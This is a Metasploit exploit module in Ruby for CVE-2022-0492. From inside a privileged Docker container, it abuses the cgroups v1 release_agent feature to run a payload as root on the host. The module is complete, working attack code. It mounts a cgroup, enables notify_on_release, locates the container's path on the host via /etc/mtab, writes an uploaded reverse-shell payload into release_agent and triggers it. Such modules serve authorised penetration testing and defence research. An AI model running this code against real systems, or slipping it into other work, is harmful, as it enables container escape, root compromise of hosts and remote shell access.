Docker cgroups Container Escape Exploit

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html

  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::Kernel
  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Docker cgroups Container Escape',
        'Description' => %q{
          This exploit module takes advantage of a Docker image which has either the privileged flag, or SYS_ADMIN Linux capability.
          If the host kernel is vulnerable, its possible to escape the Docker image and achieve root on the host operating system.

          A vulnerability was found in the Linux kernel's cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function.
          This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges
          and bypass the namespace isolation unexpectedly.

          More simply put, cgroups v1 has a feature called release_agent that runs a program when a process in the cgroup terminates.
          If notify_on_release is enabled, the kernel runs the release_agent binary as root. By editing the release_agent file,
          an attacker can execute their own binary with elevated privileges, taking control of the system. However, the release_agent
          file is owned by root, so only a user with root access can modify it.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die', # msf module
          'Yiqi Sun', # discovery
          'Kevin Wang', # discovery
          'T1erno', # POC
        ],
        'Platform' => [ 'unix', 'linux' ],
        'SessionTypes' => ['meterpreter'],
        'DefaultOptions' => {
          'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
        },
        'Privileged' => true,
        'References' => [
          [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=24f6008564183aa120d07c03d9289519c2fe02af'],
          [ 'URL', 'https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/'],
          [ 'URL', 'https://github.com/T1erno/CVE-2022-0492-Docker-Breakout-Checker-and-PoC'],
          [ 'URL', 'https://github.com/PaloAltoNetworks/can-ctr-escape-cve-2022-0492'],
          [ 'URL', 'https://github.com/SofianeHamlaoui/CVE-2022-0492-Checker/blob/main/escape-check.sh'],
          [ 'URL', 'https://pwning.systems/posts/escaping-containers-for-fun/'],
          [ 'URL', 'https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html'],
          [ 'URL', 'https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation'],
          [ 'URL', 'https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/'],
          [ 'CVE', '2022-0492']
        ],
        'DisclosureDate' => '2022-02-04',
        'Targets' => [
          ['BINARY', { 'Arch' => [ARCH_X86, ARCH_X64], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } }],
          ['CMD', { 'Arch' => ARCH_CMD, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } }]
        ],
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK]
        }
      )
    )
    register_advanced_options [
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
    ]
  end

  def base_dir
    datastore['WritableDir']
  end

  def check
    print_status('Unable to determine host OS, this check method is unlikely to be accurate if the host isn\'t Ubuntu')
    release = kernel_release
    # https://people.canonical.com/~ubuntu-security/cve/2022/CVE-2022-0492
    release_short = Rex::Version.new(release.split('-').first)
    release_long = Rex::Version.new(release.split('-')[0..1].join('-'))
    if release_short >= Rex::Version.new('5.13.0') && release_long < Rex::Version.new('5.13.0-37.42') || # Ubuntu 21.10
       release_short >= Rex::Version.new('5.4.0') && release_long < Rex::Version.new('5.4.0-105.119') || # Ubuntu 20.04 LTS
       release_short >= Rex::Version.new('4.15.0') && release_long < Rex::Version.new('4.15.0-173.182') || # Ubuntu 18.04 LTS
       release_short >= Rex::Version.new('4.4.0') && release_long < Rex::Version.new('4.4.0-222.255') # Ubuntu 16.04 ESM
      return CheckCode::Vulnerable("IF host OS is Ubuntu, kernel version #{release} is vulnerable")
    end

    CheckCode::Safe("Kernel version #{release} may not be vulnerable depending on the host OS")
  end

  def exploit
    # Check if we're already root as its required
    fail_with(Failure::NoAccess, 'The exploit needs a session as root (uid 0) inside the container') unless is_root?

    # create mount
    folder = rand_text_alphanumeric(5..10)
    @mount_dir = "#{base_dir}/#{folder}"
    register_dir_for_cleanup(@mount_dir)
    vprint_status("Creating folder for mount: #{@mount_dir}")
    mkdir(@mount_dir)
    print_status('Mounting cgroup')
    cmd_exec("mount -t cgroup -o rdma cgroup '#{@mount_dir}'")
    group = rand_text_alphanumeric(5..10)
    group_full_dir = "#{@mount_dir}/#{group}"
    vprint_status("Creating folder in cgroup for exploitation: #{group_full_dir}")
    mkdir(group_full_dir)

    print_status("Enabling notify on release for group #{group}")
    write_file("#{group_full_dir}/notify_on_release", '1')

    print_status('Determining the host OS path for image')
    # for this, we need the line that starts with overlay, and contains an 'upperdir' parameter, which we want the value of
    mtab_file = read_file('/etc/mtab')
    host_path = nil
    mtab_file.each_line do |line|
      next unless line.start_with?('overlay') && line.include?('perdir') # upperdir

      line.split(',').each do |parameter|
        next unless parameter.start_with?('upperdir')

        parameter = parameter.split('=')
        fail_with(Failure::UnexpectedReply, 'Unable to determine docker image path on host OS') unless parameter.length > 1
        host_path = parameter[1]
      end
      break
    end

    fail_with(Failure::UnexpectedReply, 'Unable to determine docker image path on host OS') if host_path.nil? || host_path.empty? || host_path.start_with?('sed') # start_with catches repeat of command

    vprint_status("Host OS path for image: #{host_path}")

    payload_path = "#{base_dir}/#{rand_text_alphanumeric(5..10)}"
    print_status("Setting release_agent path to: #{host_path}#{payload_path}")
    write_file "#{@mount_dir}/release_agent", "#{host_path}#{payload_path}"

    print_status("Uploading payload to #{payload_path}")
    if target.name == 'CMD'
      # for whatever reason it's unhappy and wont run without the /bin/sh header
      upload_and_chmodx payload_path, "#!/bin/sh\n#{payload.encoded}\n"
    elsif target.name == 'BINARY'
      upload_and_chmodx payload_path, generate_payload_exe
    end
    register_files_for_cleanup(payload_path)

    print_status("Triggering payload with command: sh -c \"echo \$\$ > #{group_full_dir}/cgroup.procs\"")
    cmd_exec(%(sh -c "echo \$\$ > '#{group_full_dir}/cgroup.procs'"))
  end

  def cleanup
    if @mount_dir
      vprint_status("Cleanup: Unmounting #{@mount_dir}")
      cmd_exec("umount '#{@mount_dir}'")
    end
    super
  end
end